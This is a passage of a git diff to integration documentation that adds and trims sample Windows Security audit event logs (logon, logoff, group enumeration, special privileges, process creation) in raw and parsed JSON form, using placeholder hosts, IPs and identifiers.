"Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } + + ``` + + === "security_event_4771.json" ```json @@ -2582,6 +4016,117 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "security_event_4798.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } + + ``` + + === "security_event_4964.json" ```json @@ -2767,11 +4312,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" @@ -2895,13 +4435,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md index cfd6eff2e..132cd3c5f 100644 --- a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md +++ b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md @@ -1658,6 +1658,333 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_event_4624" + + + ```json + { + "agent": { + "version": "7.0.0", + "hostname": "hostname", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "type": "winlogbeat" + }, + "host": { + "hostname": "hostname", + "os": { + "version": "10.0", + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "platform": "windows", + "name": "Windows Server 2019 Datacenter" + }, + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "architecture": "x86_64" + }, + "type": "winlogbeat", + "ecs": { + "version": "1.0.0" + }, + "event": { + "created": "2024-11-12T08:41:07.164Z", + "action": "Logon", + "code": 4624, + "kind": "event" + }, + "tags": [ + "beats_input_codec_plain_applied" + ], + "winlog": { + "keywords": [ + "Audit Success" + ], + "api": "wineventlog", + "version": 2, + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "record_id": 1170100815, + "event_data": { + "TargetLinkedLogonId": "0x0", + "IpPort": "29051", + "TargetOutboundUserName": "-", + "ImpersonationLevel": "%%1833", + "TargetDomainName": "DOMAIN", + "TargetOutboundDomainName": "-", + "IpAddress": "1.2.3.4", + "LogonProcessName": "Process ", + "WorkstationName": "WS-USER-01", + "LmPackageName": "-", + "SubjectUserSid": "S-1-2-3", + "ProcessId": "0x2f0", + "VirtualAccount": "%%1843", + "SubjectLogonId": "0x3e7", + "KeyLength": "0", + "RestrictedAdminMode": "-", + "TargetUserSid": "S-4-5-6", + "ElevatedToken": "%%1843", + "SubjectUserName": "WS-USER-01$", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "TransmittedServices": "-", + "LogonType": "3", + "SubjectDomainName": "DOMAIN", + "TargetUserName": "target_user", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "TargetLogonId": "0xfcebb74a", + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0" + }, + "event_id": 4624, + "computer_name": "hostname.company.com", + "channel": "Security", + "task": "Logon", + "provider_name": "Microsoft-Windows-Security-Auditing", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "opcode": "Info" + }, + "log": { + "level": "information" + }, + "message": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "@version": "1", + "@timestamp": "2024-11-12T08:41:05.803Z" + } + ``` + + + +=== "security_event_4625" + + + ```json + { + "@timestamp": "2024-11-12T08:40:34.260Z", + "event": { + "action": "Logon", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4625", + "created": "2024-11-12T08:40:35.900Z", + "kind": "event", + "dataset": "system.security" + }, + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "activity_id": "{12345678-ABCD-EFAB-CDEF-123456789012}", + "keywords": [ + "Audit Failure" + ], + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "channel": "Security", + "task": "Logon", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "event_data": { + "SubjectUserSid": "S-1-2-3", + "FailureReason": "%%2313", + "IpPort": "-", + "KeyLength": "0", + "Status": "0xc000006d", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "LogonType": "3", + "IpAddress": "-", + "LogonProcessName": "Channel", + "SubjectLogonId": "0x3e7", + "SubStatus": "0xc0000064", + "WorkstationName": "WORKSTATION", + "SubjectDomainName": "J_DOE", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "SubjectUserName": "WORKSTATION$", + "LmPackageName": "-", + "ProcessId": "0x338", + "AuthenticationPackageName": "Kerberos" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "WORKSTATION.johndoe.com", + "record_id": 2552812283, + "event_id": "4625" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "WORKSTATION", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-2222-3333-4444-555555555555" + }, + "host": { + "hostname": "hostname", + "architecture": "x86_64", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "hostname", + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "os": { + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2016 Datacenter", + "build": "14393.7428", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "fe80::1234:5678:90ab:cde", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "4.3.2.1", + "fe80::aaaa:bbbb:cccc:dddd", + "1.2.3.4", + "fe80::1234:abcd:ef", + "fe80::abcd:1234:567", + "fe80::a0b1:c2d:3e4" + ] + }, + "tags": [ + "Windows", + "beats_input_raw_event" + ] + } + ``` + + + +=== "security_event_4634" + + + ```json + { + "@timestamp": "2024-11-12T08:42:47.895Z", + "event": { + "action": "Logoff", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4634", + "created": "2024-11-12T08:42:48.190Z", + "kind": "event", + "dataset": "system.security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." + }, + "message": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.", + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "Logoff", + "channel": "Security", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "event_data": { + "TargetUserName": "ACCOUNT", + "TargetLogonId": "0x5ed35bb6", + "TargetUserSid": "S-1-2-3", + "LogonType": "3", + "TargetDomainName": "J_DOE" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.jdoe.com", + "record_id": 15983780774, + "event_id": "4634" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-2222-3333-4444-555555555555" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "pc01", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + } + } + ``` + + + === "security_event_4648" @@ -1751,112 +2078,851 @@ In this section, you will find examples of raw logs as generated natively by the "type": "windows", "family": "windows" }, - "hostname": "HOST01", + "hostname": "HOST01", + "ip": [ + "1.2.3.4", + "fe80::abcd:123:456" + ] + }, + "event_ingest_logstash": "2023-11-09T09:05:14.912238Z", + "fields.gdp-logstash": "5", + "@version": "1" + } + ``` + + + +=== "security_event_4662" + + + ```json + { + "log": { + "level": "information" + }, + "@timestamp": "2024-11-12T09:07:11.844Z", + "message": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "tags": [ + "beats_input_codec_plain_applied" + ], + "event": { + "created": "2024-11-12T09:07:13.714Z", + "action": "Directory Service Access", + "provider": "Microsoft-Windows-Security-Auditing", + "outcome": "success", + "code": "4662", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "kind": "event" + }, + "@version": "1", + "agent": { + "name": "ACCOUNT01", + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "type": "winlogbeat", + "version": "8.12.2", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab" + }, + "host": { + "hostname": "account01", + "mac": [ + "00-11-22-33-44-55" + ], + "architecture": "x86_64", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "name": "account01", + "ip": [ + "1.2.3.4" + ], + "os": { + "type": "windows", + "build": "17763.6414", + "name": "Windows Server 2019 Standard", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "platform": "windows", + "version": "10.0", + "family": "windows" + } + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "api": "wineventlog", + "channel": "Security", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "task": "Directory Service Access", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "record_id": 476080242, + "event_id": "4662", + "provider_name": "Microsoft-Windows-Security-Auditing", + "opcode": "Informations", + "computer_name": "ACCOUNT01.domain.local", + "event_data": { + "HandleId": "0x0", + "SubjectLogonId": "0xc2b9d138", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "ObjectServer": "DS", + "OperationType": "Object Access", + "SubjectUserSid": "S-1-2-3", + "AdditionalInfo": "-", + "AccessMask": "0x100", + "SubjectDomainName": "DOMAIN", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "SubjectUserName": "ACCOUNT01$", + "AccessList": "%%7688\n\t\t\t\t", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}" + } + } + } + ``` + + + +=== "security_event_4672" + + + ```json + { + "event": { + "provider": "Microsoft-Windows-Security-Auditing", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "code": "4672", + "outcome": "success", + "created": "2024-11-12T09:08:54.122Z", + "action": "Special Logon", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:08:50.647Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "host": { + "name": "USER01-WIN.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "channel": "Security", + "task": "Special Logon", + "computer_name": "USER01-WIN.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "event_data": { + "SubjectLogonId": "0x40c158b6", + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + }, + "process": { + "thread": { + "id": 27812 + }, + "pid": 828 + }, + "event_id": "4672", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 288206963 + }, + "@version": "1" + } + ``` + + + +=== "security_event_4688" + + + ```json + { + "tags": [ + "beats_input_codec_plain_applied" + ], + "event": { + "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "action": "Process Creation", + "kind": "event", + "outcome": "success", + "created": "2023-11-09T08:43:52.407Z", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4688" + }, + "@version": "1", + "@timestamp": "2023-11-09T08:43:51.462Z", + "message": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "winlog": { + "computer_name": "HOST01.company.test", + "provider_name": "Microsoft-Windows-Security-Auditing", + "channel": "Security", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "keywords": [ + "Audit Success" + ], + "version": 2, + "event_id": "4688", + "process": { + "pid": 4, + "thread": { + "id": 17028 + } + }, + "task": "Process Creation", + "event_data": { + "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", + "TokenElevationType": "%%1936", + "MandatoryLabel": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "SubjectUserSid": "S-1-1-1", + "SubjectDomainName": "COMPANY", + "SubjectLogonId": "0x3e7", + "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", + "NewProcessId": "0x1d9c", + "TargetDomainName": "-", + "ProcessId": "0x2a0", + "SubjectUserName": "HOST01$", + "TargetUserName": "-", + "NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", + "TargetLogonId": "0x0" + }, 